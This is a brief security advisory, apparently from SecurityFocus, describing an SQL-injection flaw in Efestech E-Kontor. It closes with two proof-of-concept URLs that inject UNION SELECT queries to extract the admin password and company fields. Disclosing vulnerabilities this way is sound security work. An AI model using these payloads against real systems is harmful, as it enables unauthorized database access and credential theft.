8 lines
No EOL
530 B
Text
8 lines
No EOL
530 B
Text
source: https://www.securityfocus.com/bid/28412/info
|
|
|
|
Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
|
|
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 |